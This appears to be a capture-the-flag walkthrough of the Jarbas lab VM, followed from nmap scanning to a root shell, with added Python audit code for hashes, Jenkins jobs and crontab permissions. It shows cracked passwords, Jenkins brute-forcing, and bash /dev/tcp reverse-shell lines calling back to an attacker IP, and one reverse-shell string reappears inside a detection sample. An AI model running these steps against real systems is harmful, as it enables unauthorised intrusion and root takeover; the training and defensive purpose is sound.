Information gathering

  • Kali and the target are on the same network segment, so look up the target's IP address directly:
root at kali in ~ 
$ nmap -sn --min-rate 10000 192.168.92.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-02 20:13 CST
Nmap scan report for 192.168.92.1
Host is up (0.00040s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.92.2
Host is up (0.00017s latency).
MAC Address: 00:50:56:F3:1F:1F (VMware)
Nmap scan report for 192.168.92.145
Host is up (0.00033s latency).
MAC Address: 00:0C:29:23:07:8B (VMware)
Nmap scan report for 192.168.92.254
Host is up (0.00014s latency).
MAC Address: 00:50:56:E1:1E:EB (VMware)
Nmap scan report for 192.168.92.170
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.00 seconds
  • Scan for open ports:
root at kali in ~ 
$ nmap -p- --min-rate 10000 192.168.92.145
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-02 20:16 CST
Nmap scan report for 192.168.92.145
Host is up (0.00024s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy
MAC Address: 00:0C:29:23:07:8B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 67.83 seconds
  • Identify the services behind those ports:
root at kali in ~ 
$ nmap -p22,80,3306,8080 -sT -sV -O --min-rate 10000 192.168.92.145
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-02 20:18 CST
Nmap scan report for 192.168.92.145
Host is up (0.00056s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Jetty 9.4.z-SNAPSHOT
MAC Address: 00:0C:29:23:07:8B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.56 seconds
  • Run the vulnerability scripts against those services:
root at kali in ~ 
$ nmap -p22,80,3306,8080 --script=vuln --min-rate 10000 192.168.92.145
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-02 20:20 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.92.145
Host is up (0.00048s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
3306/tcp open mysql
8080/tcp open http-proxy
| http-enum:
|_ /robots.txt: Robots file
MAC Address: 00:0C:29:23:07:8B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 67.31 seconds
  • Analyse the scan results:
# Open ports: 22, 80, 3306, 8080

22 - SSH - weak passwords, brute force
80 - Web - many possible vulnerability classes
3306 - MySQL - weak passwords, brute force
8080 - Web - many possible vulnerability classes
  • Start testing with the web service on port 80.

Directory scanning

  • Visit the web service:

image-20231111103141831

  • Hmm, Jenkins. Scan it with dirsearch:
root at kali in ~ 
$ dirsearch -u 'http://192.168.92.145'

image-20231111103147301

  • A few directories turn up; visit them:

image-20231111103153485

  • There is an access.html; open it:

image-20231111103158124

  • It says “Creds encrypted in a safe way!”, so these are presumably hashed credentials. They look like MD5 at a glance, but to be rigorous, check:
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98

root at kali in ~
$ hash-identifier '5978a63b4654c73c60fa24f836386d87'
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
  • Confirmed as MD5; look them up on an online MD5 lookup site:
tiago:5978a63b4654c73c60fa24f836386d87 - italia99
trindade:f463f63616cb3f1e81ce46b39f882fd5 - marianna
eder:9b38e2b1e8b12f426b0d208a7ab6cb98 - vipsu
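The reason these three credentials fell to a lookup site is that they were stored as bare, unsalted MD5: a fast hash, no salt, so identical passwords hash identically and precomputed tables work. The following is an added example, not code from the write-up or from the Jarbas machine. It flags unsalted fixed-length digests in a `user:value` file (the same length heuristic hash-identifier uses) and shows the storage format a defender should use instead: salted PBKDF2-HMAC-SHA256 with constant-time verification. The sample credential lines are the ones leaked above; the iteration count and the `$pbkdf2-sha256$` encoding are assumptions of this example.

```python
import hashlib
import hmac
import os
import re

# Constructed sample in the same "user:digest" layout as the leaked access.html lines.
SAMPLE_CREDS = """tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
"""

# Bare hex digests can only be told apart by length; this is the same heuristic
# hash-identifier applies. None of these formats carry a salt or a work factor.
UNSALTED_HEX = {32: "MD5 (or another 128-bit digest)", 40: "SHA-1",
                64: "SHA-256", 128: "SHA-512"}

PBKDF2_ITERATIONS = 600_000  # assumption: a 2023-era PBKDF2-HMAC-SHA256 work factor


def classify_digest(value):
    """Name the likely format of one stored credential value."""
    v = value.strip()
    if v.startswith("$pbkdf2-sha256$"):
        return "salted PBKDF2-SHA256"
    if re.fullmatch(r"[0-9a-fA-F]+", v) and len(v) in UNSALTED_HEX:
        return UNSALTED_HEX[len(v)]
    return "unknown"


def audit_creds(text):
    """Return [(user, classification, is_finding)] for each user:value line."""
    results = []
    for line in text.splitlines():
        if ":" not in line:
            continue
        user, value = line.split(":", 1)
        kind = classify_digest(value)
        # Any unsalted fixed-length digest is a finding: fast to compute, no salt,
        # and directly answerable by a precomputed lookup.
        results.append((user.strip(), kind, kind in UNSALTED_HEX.values()))
    return results


def hash_password(password, salt=None):
    """Store a password as $pbkdf2-sha256$<iterations>$<salt hex>$<dk hex>."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return "$pbkdf2-sha256$%d$%s$%s" % (PBKDF2_ITERATIONS, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Recompute the derived key from the stored salt and compare in constant time."""
    _, alg, iterations, salt_hex, dk_hex = stored.split("$")
    if alg != "pbkdf2-sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


if __name__ == "__main__":
    for user, kind, finding in audit_creds(SAMPLE_CREDS):
        print("%-10s %-35s %s" % (user, kind, "FINDING" if finding else "ok"))
    # The same password stored twice yields two different strings because of the salt,
    # so a leaked table no longer reveals which users share a password.
    stored_a = hash_password("vipsu")
    stored_b = hash_password("vipsu")
    print(stored_a != stored_b, verify_password("vipsu", stored_a), verify_password("vipsU", stored_a))
```

The audit half is what you would run over a credential dump during incident triage to decide how fast the passwords will be recovered; the storage half is the fix to ship. Note that a salt stops lookup tables but not a targeted guess of a weak password such as those above, so the iteration count is what buys time.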
  • No login form was found here, so try port 8080:

image-20231111103204728

  • It is a Jenkins login page.

Brute force

  • There is a login form, so brute-force it with Burp Suite:

image-20231111103209001
image-20231111103214378

  • The brute force yields the credentials eder / vipsu.
  • Log in:

image-20231111103221653

Jenkins vulnerability

  • Create a new item:

image-20231111103226422

  • Enter a name:

image-20231111103231288

  • An “Execute shell” build step is available right there:

image-20231111103235750

  • Set up a reverse shell:
# target
/bin/bash -i >& /dev/tcp/192.168.92.170/4444 0>&1

# kali
root at kali in ~
$ nc -lvvp 4444
listening on [any] 4444 ...
  • Click “Build Now”:

image-20231111103240311
image-20231111103245070

  • The shell comes back:
root at kali in ~ 
$ nc -lvvp 4444
listening on [any] 4444 ...
192.168.92.145: inverse host lookup failed: Unknown host
connect to [192.168.92.170] from (UNKNOWN) [192.168.92.145] 52200
bash: no job control in this shell
bash-4.2$ id
id
uid=997(jenkins) gid=995(jenkins) groups=995(jenkins) context=system_u:system_r:initrc_t:s0
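What makes this step work is not a software bug but authorization: the account obtained by brute force is allowed to create jobs and add an “Execute shell” build step, which runs as the jenkins user. The mitigation is to restrict Job/Create, Job/Configure and Job/Build to trusted accounts and to rate-limit or lock out failed logins; the detection side is to audit what the shell build steps actually contain. The following is an added example, not part of the write-up and not Jenkins' own code. It parses the freestyle-job `config.xml` layout Jenkins writes for `hudson.tasks.Shell` build steps and flags the indicators seen in the command above. The two job documents are constructed; the `audit_jenkins_home` path layout (`$JENKINS_HOME/jobs/<name>/config.xml`) is assumed.

```python
import glob
import os
import re
import xml.etree.ElementTree as ET

# Constructed freestyle-job config.xml with the build step used in the write-up.
# XML escaping: &gt; is '>' and &amp; is '&'.
MALICIOUS_JOB = """<project>
  <description></description>
  <builders>
    <hudson.tasks.Shell>
      <command>/bin/bash -i &gt;&amp; /dev/tcp/192.168.92.170/4444 0&gt;&amp;1</command>
    </hudson.tasks.Shell>
  </builders>
</project>
"""

# Constructed ordinary build job for comparison.
BENIGN_JOB = """<project>
  <builders>
    <hudson.tasks.Shell>
      <command>set -e
mvn -B clean verify</command>
    </hudson.tasks.Shell>
  </builders>
</project>
"""

# Indicators that a build step is a shell callback rather than a build.
# Limited to the constructs that appear in the command above.
INDICATORS = [
    ("bash /dev/tcp redirection", re.compile(r"/dev/(tcp|udp)/")),
    ("interactive shell flag", re.compile(r"\b(ba|z|da)?sh\s+-i\b")),
    ("stdin/stdout tied to a socket", re.compile(r"0>&1|>&\s*/dev/")),
]


def shell_commands(config_xml):
    """Return every Execute-shell command in a freestyle job config.xml."""
    root = ET.fromstring(config_xml)
    return [c.text or "" for c in root.findall("./builders/hudson.tasks.Shell/command")]


def audit_job(config_xml):
    """Return [(indicator label, matched text)] across all shell steps of one job."""
    hits = []
    for cmd in shell_commands(config_xml):
        for label, rx in INDICATORS:
            m = rx.search(cmd)
            if m:
                hits.append((label, m.group(0)))
    return hits


def audit_jenkins_home(home):
    """Audit every job under $JENKINS_HOME/jobs; returns {job name: hits} for jobs with hits."""
    findings = {}
    for path in glob.glob(os.path.join(home, "jobs", "*", "config.xml")):
        with open(path, encoding="utf-8") as f:
            hits = audit_job(f.read())
        if hits:
            findings[os.path.basename(os.path.dirname(path))] = hits
    return findings


if __name__ == "__main__":
    for name, doc in (("constructed-malicious", MALICIOUS_JOB), ("constructed-benign", BENIGN_JOB)):
        print(name, audit_job(doc))
```

Run `audit_jenkins_home("/var/lib/jenkins")` on the controller (or over a backup of it) after any suspected credential compromise; the job name and its `builds/*/log` files then show who created the job and when it ran.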

Cron privilege escalation

  • After some enumeration, the crontab has a scheduled task that runs as root:
bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
  • Look at that file:
bash-4.2$ ls -l /etc/script/CleaningScript.sh
ls -l /etc/script/CleaningScript.sh
-rwxrwxrwx. 1 root root 50 Apr 1 2018 /etc/script/CleaningScript.sh
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt
  • The file is world-readable, -writable and -executable, so append a reverse shell to it:
# target
bash-4.2$ echo '/bin/bash -i >& /dev/tcp/192.168.92.170/4445 0>&1' >> /etc/script/CleaningScript.sh
<i >& /dev/tcp/192.168.92.170/4445 0>&1' >> /etc/script/CleaningScript.sh

# kali
root at kali in ~
$ nc -lvvp 4445
listening on [any] 4445 ...
  • The root shell comes back:
root at kali in ~ 
$ nc -lvvp 4445
listening on [any] 4445 ...
192.168.92.145: inverse host lookup failed: Unknown host
connect to [192.168.92.170] from (UNKNOWN) [192.168.92.145] 49678
bash: no job control in this shell
[root@jarbas ~]# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023

[root@jarbas ~]# cd /root
cd /root
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat fla*
cat fla*
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs
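The escalation above rests on one misconfiguration: a script that cron runs as root is mode 0777, so any local user can edit what root executes every five minutes. The following is an added example, not part of the write-up and not a tool from the Jarbas machine. It parses `/etc/crontab`-style job lines, and for every job that runs as root checks whether the program it invokes (or the program's parent directory) is writable by someone other than the trusted owner. The crontab text is constructed from the entry found above; the `root=` parameter, which lets the audit run against a temporary directory tree instead of the live filesystem, and the `trusted_uid` parameter are assumptions of this example.

```python
import os
import stat
import tempfile

# Constructed /etc/crontab content mirroring the entry found on the target.
SAMPLE_CRONTAB = """SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# m h dom mon dow user command
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
0 3 * * * root /usr/local/bin/rotate-logs.sh
@daily backup /usr/local/bin/backup.sh
"""


def parse_system_crontab(text):
    """Yield (user, command) for each job line of a system crontab (/etc/crontab layout)."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split(None, 1)[0]:   # SHELL=/bin/bash etc. are not jobs
            continue
        if line.startswith("@"):            # @daily user command
            parts = line.split(None, 2)
            if len(parts) != 3:
                continue
        else:                               # m h dom mon dow user command
            parts = line.split(None, 6)
            if len(parts) != 7:
                continue
        yield parts[-2], parts[-1]


def writable_by_untrusted(path, trusted_uid):
    """Reason string if someone other than the trusted owner can change this file, else None."""
    st = os.stat(path)
    mode = st.st_mode
    if mode & stat.S_IWOTH:
        return "world-writable (%s)" % stat.filemode(mode)
    if mode & stat.S_IWGRP and st.st_gid != 0:
        return "group-writable by gid %d (%s)" % (st.st_gid, stat.filemode(mode))
    if st.st_uid != trusted_uid:
        return "owned by uid %d, not the trusted uid %d" % (st.st_uid, trusted_uid)
    return None


def audit_crontab(text, root="/", trusted_uid=0):
    """Return [(program, reason)] for root jobs whose program can be altered by others."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        prog = command.split()[0]                      # the program cron will execute
        real = os.path.join(root, prog.lstrip("/"))    # re-rooted for test trees
        if not os.path.exists(real):
            findings.append((prog, "missing target (dangling cron entry)"))
            continue
        reason = writable_by_untrusted(real, trusted_uid)
        if reason is None:
            # A locked-down file in a world-writable directory can still be replaced.
            pst = os.stat(os.path.dirname(real))
            if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
                reason = "parent directory is world-writable without the sticky bit"
        if reason:
            findings.append((prog, reason))
    return findings


def demo():
    """Build a throwaway tree reproducing the target's layout and audit it."""
    root = tempfile.mkdtemp()
    bad = os.path.join(root, "etc/script/CleaningScript.sh")   # 0777 as on the target
    good = os.path.join(root, "usr/local/bin/rotate-logs.sh")  # 0755, the sane setting
    for path, mode in ((bad, 0o777), (good, 0o755)):
        os.makedirs(os.path.dirname(path), exist_ok=True)
        os.chmod(os.path.dirname(path), 0o755)
        with open(path, "w") as f:
            f.write("#!/bin/bash\nrm -rf /var/log/httpd/access_log.txt\n")
        os.chmod(path, mode)
    # Files in the temp tree belong to whoever runs this, so that uid is trusted here.
    return audit_crontab(SAMPLE_CRONTAB, root=root, trusted_uid=os.getuid())


if __name__ == "__main__":
    for prog, reason in demo():
        print("FINDING %s: %s" % (prog, reason))
```

On a real host run `audit_crontab(open("/etc/crontab").read())` with the defaults, and extend it over `/etc/cron.d/*` and the `/etc/cron.{hourly,daily,weekly,monthly}` directories, which use the same rules. The fix for the entry above is `chmod 700 /etc/script/CleaningScript.sh` (root-owned, in a root-owned directory).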